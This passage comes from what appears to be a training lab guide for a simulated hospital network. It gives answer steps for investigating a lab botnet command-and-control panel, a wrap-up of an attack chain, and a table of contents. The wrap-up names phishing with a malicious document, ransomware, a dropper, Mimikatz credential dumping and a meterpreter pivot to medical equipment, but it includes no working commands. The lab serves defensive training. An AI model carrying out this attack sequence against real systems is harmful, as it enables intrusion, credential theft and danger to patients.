6	Double-click an item to reveal even more information. Notice the host is www.sportsfans.atk\r\n. It looks like we have a website to which something was trying to communicate. This is very likely the bot installed on the desktop beaconing back to the C2.
7	Go to the website www.sportsfans.atk to see the same result as the IP showing the Ubuntu server.
8	Note that if you try to access the full, entire URL found, you will find it leads to a dead page. We can see that this is likely how the infected IT system is communicating to the C2.

Part 2: C2 Hack Back Answers

Procedure

1	Open a browser, and then go to www.sportfans.atk/shop/main.php.
2	Log in with admin for both the user and the password and complete the CAPTCHA question.
3	From the dashboard, you can find answers to each question. Let’s start with how many targets have been infected. You can see at the top that only one client has been infected. You can also see the version number of the one infected client at the bottom along with other interesting details.
4	What was the last attack executed by this source that was successful? Click Tasks at the top to retrieve a list of what has run. The third column shows that the last item has not failed; hence, it was successful. It’s not the most obvious thing to understand, but that’s how this system was designed.
5	You can see that seven tasks were executed. Since we just figured out that the last item in the third column was successful, we now know that six tasks failed.
6	Next, we will look at how often this beacons out to infected systems (also known as “the knock interval”). Click Settings to see it is set to 5.
7	Finally, we need to see where the infected file was installed and find out its name. Click Details next to the infected client, and then scroll down to see more details about the infection.
8	As you scroll down, you see multiple details about the compromised system, including the file installed and where it was installed. You were asked to summarize what potentially occurred. It is very likely that someone either downloaded the wrong software or went to a website that identified a vulnerability on this workstation and used that to push software to the system. When the software was installed, it beaconed back to the C2 permitting a remote party to have complete access to this computer. The software beacons back to the sport fans website, which is obviously a cover for the C2. That wraps up the questions you were asked to answer. Feel free to poke around in the C2 GUI to learn more about how it works. Congratulations! You have now completed this scenario.

Wrap Up

In this lab, you performed a chain exploitation process with the goal of gaining access to an Internal medical system that administers medication to CEO Emily Williams. You first needed to get a foothold within the network, which you used a phishing attack laced with a malicious document. When the victim opened the document, that system (DR) was infected with Ransomware as well as a hidden dropper. The Ransomware acted as a distraction while you used the dropper to collect data about the Dr Computer. You used Empire Bloodhound and Mimikatz to find other targets and dump passwords out of memory. You eventually upgraded your access to a RAT by installing a meterpreter on the JUMPHOST. Using the meterpreter, you added a route; therefore you can route your attack laptop's traffic through the JUMPHOST so you could access the CEO's medical equipment. You used the stolen credentials to access the medical equipment leading to your desired outcome. Game over for the CEO .... unless the HackMDs SOC has something to about it!

Well done! You have completed this scenario.

1	Initiate your dCloud session. [Show Me How] Note: It may take up to 10 minutes for your session to become active. Click the red notification icon (bell) to check.
2	Click My Hub in dCloud and locate the demo named: Cyber Defense Clinic Lab
3	Click the View button to start the demo.

1	Search for topics you are interested in, such as product names, common error messages, known banners, etc.
2	To explore some of the most frequent searches for the Shodan site, click the Explore button. Enjoy exploring the world-wide-web of vulnerable things. Insert image here.

About

This Lab

Requirements

This Solution

Cyber Resilience Platform Comic Books

Topology

Before You Present

PREPARATION IS KEY TO A SUCCESSFUL PRESENTATION.

Get Started

Procedure

Scenarios

HackMDs.com: Connect and Set Up (Required)

Connect to the Lab Jumphost

Procedure

Validate Enterprise Systems

Procedure

Validate Security Systems

Procedure

Target Reconnaissance: Gather Information about Vulnerabilities for a Future Attack

Lab Resources

Web Reconnaissance using Shodan

Access Shodan

Procedure

Popular Shodan Searches

Procedure

Bonus: Advanced Shodan search queries

Attacker Reconnaissance using Masscan

Reconnaissance using Masscan

Procedure

Discover a vulnerability using home grown tools

Procedure

Reconnaissance using NMAP

Defender Reconnaissance Steps

Reconnaissance using NMAP

Procedure

Use Rapid 7 InsightVM for Discovery

Procedure

Summary

Bonus Section - Nmap Advanced Options

Procedure

Smash and Grab: Attack Public Network Services Through the Front Door

Outcome

Lab Resources

Launch the Exploit

Procedure

Defend Web Resources with Intrusion Prevention

Procedure

Reference Information (optional to cover in lab)

Scenario 3 Smash and Grab: Attack Public Network Services through the Front Door (continued)

Procedure

Validate the Attack No Longer Works

Procedure

Rapid7 InsightVM Integration with Cisco Firepower: Overview

Procedure

Bonus Lab - Tuning the Firepower NGIPS

Procedure

Advanced Lab – Pivoting [Advanced]

Procedure

Summary

The Ransom Scenario: Respond to Advanced Persistent Threats (APTs)

Outcome

Lab Resources

Verify you can access the Botnet Command and Control Server

Procedure

Email Security Failure

Procedure

Set Up Cisco AMP

Procedure

Infect the Victim Part 1 (Failure)

Procedure

Investigate the Attack

Procedure

Set Up Cisco SecureX

Procedure

Remove AMP and Infect the Host Part 2

Procedure

Incident Response: Post Infection

Procedure

Summary

Insider Threats: Move Within to Obtain and Export Your Data